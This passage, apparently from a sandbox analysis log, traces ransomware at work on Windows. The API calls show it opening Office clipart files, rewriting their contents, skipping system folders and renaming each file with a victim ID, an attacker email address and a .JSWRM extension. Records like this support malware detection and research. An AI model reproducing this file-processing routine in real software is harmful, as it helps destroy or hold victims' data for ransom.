lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0087.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214948.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.953] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=44794) returned 1 [0087.953] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xaef0) returned 0x24d210 [0087.953] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xaef0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xaef0, lpOverlapped=0x0) returned 1 [0087.958] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.958] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xaef0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xaef0, lpOverlapped=0x0) returned 1 [0087.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.959] CloseHandle (hObject=0x314) returned 1 [0087.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0087.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0087.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0087.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0087.959] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0087.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0087.959] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.959] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214948.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0214948.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0214948.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0087.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0087.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0087.960] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec210f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d6c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0215070.WMF", cAlternateFileName="")) returned 1 [0087.960] lstrcmpiW (lpString1="J0215070.WMF", lpString2=".") returned 1 [0087.960] lstrcmpiW (lpString1="J0215070.WMF", lpString2="..") returned 1 [0087.961] lstrcmpiW (lpString1="J0215070.WMF", lpString2="...") returned 1 [0087.961] lstrcmpiW (lpString1="J0215070.WMF", lpString2="windows") returned -1 [0087.961] lstrcmpiW (lpString1="J0215070.WMF", lpString2="recovery") returned -1 [0087.961] lstrcmpiW (lpString1="J0215070.WMF", lpString2="perflogs") returned -1 [0087.961] lstrcmpiW (lpString1="J0215070.WMF", lpString2="documents and settings") returned 1 [0087.961] lstrcmpiW (lpString1="J0215070.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.961] lstrcmpiW (lpString1="J0215070.WMF", lpString2="system volume information") returned -1 [0087.961] lstrcmpiW (lpString1="J0215070.WMF", lpString2="msocache") returned -1 [0087.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0087.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215070.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215070.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0215070.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0087.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0087.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215070.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215070.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0215070.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0087.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0087.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0087.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0087.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215070.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.962] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11628) returned 1 [0087.962] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24d210 [0087.963] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2d60, lpOverlapped=0x0) returned 1 [0087.965] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.965] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2d60, lpOverlapped=0x0) returned 1 [0087.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.965] CloseHandle (hObject=0x314) returned 1 [0087.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0087.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0087.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0087.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0087.965] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0087.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0087.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.966] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215070.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215070.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215070.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0087.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0087.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0087.966] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec210f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec210f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec210f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f50, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0215076.WMF", cAlternateFileName="")) returned 1 [0087.966] lstrcmpiW (lpString1="J0215076.WMF", lpString2=".") returned 1 [0087.966] lstrcmpiW (lpString1="J0215076.WMF", lpString2="..") returned 1 [0087.966] lstrcmpiW (lpString1="J0215076.WMF", lpString2="...") returned 1 [0087.966] lstrcmpiW (lpString1="J0215076.WMF", lpString2="windows") returned -1 [0087.966] lstrcmpiW (lpString1="J0215076.WMF", lpString2="recovery") returned -1 [0087.966] lstrcmpiW (lpString1="J0215076.WMF", lpString2="perflogs") returned -1 [0087.966] lstrcmpiW (lpString1="J0215076.WMF", lpString2="documents and settings") returned 1 [0087.966] lstrcmpiW (lpString1="J0215076.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.966] lstrcmpiW (lpString1="J0215076.WMF", lpString2="system volume information") returned -1 [0087.966] lstrcmpiW (lpString1="J0215076.WMF", lpString2="msocache") returned -1 [0087.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0087.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215076.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215076.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0215076.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0087.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0087.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215076.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215076.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0215076.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0087.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0087.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0087.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0087.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215076.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.967] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8016) returned 1 [0087.967] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f50) returned 0x205850 [0087.968] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1f50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1f50, lpOverlapped=0x0) returned 1 [0087.970] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.970] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1f50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1f50, lpOverlapped=0x0) returned 1 [0087.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0087.970] CloseHandle (hObject=0x314) returned 1 [0087.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0087.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0087.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0087.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0087.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0087.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0087.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0087.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0087.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.971] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215076.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215076.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215076.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0087.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0087.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0087.972] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec210f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xec210f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec210f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x81ce, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0215210.WMF", cAlternateFileName="")) returned 1 [0087.972] lstrcmpiW (lpString1="J0215210.WMF", lpString2=".") returned 1 [0087.972] lstrcmpiW (lpString1="J0215210.WMF", lpString2="..") returned 1 [0087.972] lstrcmpiW (lpString1="J0215210.WMF", lpString2="...") returned 1 [0087.972] lstrcmpiW (lpString1="J0215210.WMF", lpString2="windows") returned -1 [0087.972] lstrcmpiW (lpString1="J0215210.WMF", lpString2="recovery") returned -1 [0087.972] lstrcmpiW (lpString1="J0215210.WMF", lpString2="perflogs") returned -1 [0087.972] lstrcmpiW (lpString1="J0215210.WMF", lpString2="documents and settings") returned 1 [0087.972] lstrcmpiW (lpString1="J0215210.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.972] lstrcmpiW (lpString1="J0215210.WMF", lpString2="system volume information") returned -1 [0087.972] lstrcmpiW (lpString1="J0215210.WMF", lpString2="msocache") returned -1 [0087.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0087.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215210.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215210.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0215210.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0087.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0087.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215210.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215210.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0215210.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0087.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0087.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0087.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0087.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215210.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.973] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=33230) returned 1 [0087.973] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x81c0) returned 0x24d210 [0087.973] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x81c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x81c0, lpOverlapped=0x0) returned 1 [0087.984] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.984] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x81c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x81c0, lpOverlapped=0x0) returned 1 [0087.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.985] CloseHandle (hObject=0x314) returned 1 [0087.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0087.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, 